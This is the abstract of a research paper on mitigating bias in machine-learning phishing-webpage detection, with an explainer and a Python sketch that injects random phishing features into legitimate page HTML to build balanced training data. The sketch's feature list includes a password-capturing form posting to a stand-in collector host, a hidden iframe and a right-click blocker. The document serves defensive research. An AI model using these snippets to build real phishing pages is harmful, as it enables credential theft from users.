Mitigating Bias in Machine Learning Models for Phishing Webpage Detection

Aditya Kulkarni, Vivek Balachandran, Dinil Mon Divakaran, Tamal Das
2024-01-16
Abstract: The widespread accessibility of the Internet has led to a surge in online fraudulent activities, underscoring the necessity of shielding users' sensitive information from cybercriminals. Phishing, a well-known cyberattack, revolves around the creation of phishing webpages and the dissemination of corresponding URLs, aiming to deceive users into sharing their sensitive information, often for identity theft or financial gain. Various techniques are available for preemptively categorizing zero-day phishing URLs by distilling unique attributes and constructing predictive models. However, these existing techniques encounter unresolved issues. This proposal delves into persistent challenges within phishing detection solutions, particularly concentrated on the preliminary phase of assembling comprehensive datasets, and proposes a potential solution in the form of a tool engineered to alleviate bias in ML models. Such a tool can generate phishing webpages for any given set of legitimate URLs, infusing randomly selected content and visual-based phishing features. Furthermore, we contend that the tool holds the potential to assess the efficacy of existing phishing detection solutions, especially those trained on confined datasets.
Cryptography and Security
What problem does this paper attempt to address?
This paper addresses the bias that existing machine learning (ML) models exhibit when detecting phishing webpages, a bias that originates in the initial stage of dataset construction. It focuses on two main issues:

1. **Imbalanced Dataset**: In the datasets used to train ML models, the numbers of legitimate and phishing URLs are often disproportionate, which biases the model during classification. The model becomes more likely to predict the majority class (usually legitimate URLs), reducing its accuracy on new (zero-day) phishing attacks.
2. **Lack of Diversity**: Many researchers collect phishing samples from a single repository, which limits the diversity of the dataset and may leave the model unable to recognize different types of phishing features. Accurate phishing detection requires a dataset that covers multiple kinds of phishing features, including URL features and webpage content features (such as logos, icons, HTML, CSS, and JS/PHP code).

To solve these problems, the paper proposes a tool that generates corresponding phishing webpages from a given set of legitimate URLs by randomly adding content and visual-based phishing features. A dataset generated this way is balanced between legitimate and phishing webpages and is more diverse. The tool can also be used to evaluate the effectiveness of existing phishing detection solutions, especially models trained on limited datasets.

### Specific Problem Description

- **Imbalanced Dataset**: When trained on an imbalanced dataset, an ML model is biased towards the majority class (usually legitimate URLs), which reduces classification accuracy for the minority class (phishing URLs).

  \[ \text{Imbalanced Dataset} \to \text{Bias in Model} \to \text{Reduced Accuracy for Minority Class (Phishing URLs)} \]

- **Lack of Diversity**: Phishing samples obtained from a single repository may not cover all types of phishing features, so the model performs poorly when it encounters new types of phishing attacks.

### Solution Overview

The tool proposed in the paper generates phishing webpages through the following steps:

1. **Input**: A legitimate URL and a set of $k$ phishing features.
2. **Processing**:
   - Visit the legitimate URL and download its source code.
   - Randomly select diverse content and visual-based phishing features and add them to the webpage.
3. **Output**: A phishing webpage with $k$ phishing features embedded.

In this way, the generated dataset maintains the balance between legitimate and phishing webpages and is also more diverse, which improves the accuracy of ML models in detecting new phishing attacks.

### Conclusion and Future Outlook

This research examines the ongoing challenges in phishing detection solutions, especially in the foundational stage of dataset construction. The proposed tool alleviates dataset-related problems by generating phishing webpages, offering a new approach for future phishing detection research. It can also be used to evaluate existing phishing detection solutions, particularly models trained on limited datasets.
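
The input, processing, and output steps in the Solution Overview can be illustrated with a minimal Python sketch. It is not the authors' implementation: the feature catalogue `FEATURE_SNIPPETS`, the helper `inject`, and the function `generate_phishing_page` are hypothetical names introduced here, the four features are placeholders chosen for illustration, and the download step is omitted so that the example runs offline on an HTML string.

```python
import random
import re

# Hypothetical feature catalogue (not from the paper): name -> HTML snippet.
# Hosts use the reserved ".invalid" TLD, so nothing here resolves.
FEATURE_SNIPPETS = {
    "external_form": '<form action="http://collector.invalid/submit" method="post">'
                     '<input type="password" name="pw"></form>',
    "hidden_iframe": '<iframe src="http://collector.invalid/" style="display:none"></iframe>',
    "empty_anchor": '<a href="#">Account settings</a>',
    "no_right_click": '<script>document.oncontextmenu = () => false;</script>',
}


def inject(html, snippet):
    """Place snippet just before the last </body> tag, or append if none exists."""
    matches = list(re.finditer(r"</body\s*>", html, flags=re.IGNORECASE))
    if not matches:
        return html + snippet
    idx = matches[-1].start()
    return html[:idx] + snippet + html[idx:]


def generate_phishing_page(html, k, rng=None):
    """Embed k distinct, randomly chosen features into a legitimate page's HTML.

    Returns the modified HTML and the names of the features that were used.
    """
    if not 0 <= k <= len(FEATURE_SNIPPETS):
        raise ValueError(f"k must be between 0 and {len(FEATURE_SNIPPETS)}")
    if rng is None:
        rng = random.Random()
    chosen = rng.sample(sorted(FEATURE_SNIPPETS), k)  # sample without replacement
    for name in chosen:
        html = inject(html, FEATURE_SNIPPETS[name])
    return html, chosen


# Stand-in for the downloaded source of a legitimate URL.
legit_html = "<html><body><h1>Example Bank</h1></body></html>"
page, used = generate_phishing_page(legit_html, k=2, rng=random.Random(0))
print(used)
print(page)
```

Generating one synthetic page per legitimate page in this way yields a 1:1 class ratio by construction, and drawing the features at random is what spreads the samples across different feature combinations. A real tool would also need to fetch the page source and handle visual features such as logos, which this sketch leaves out.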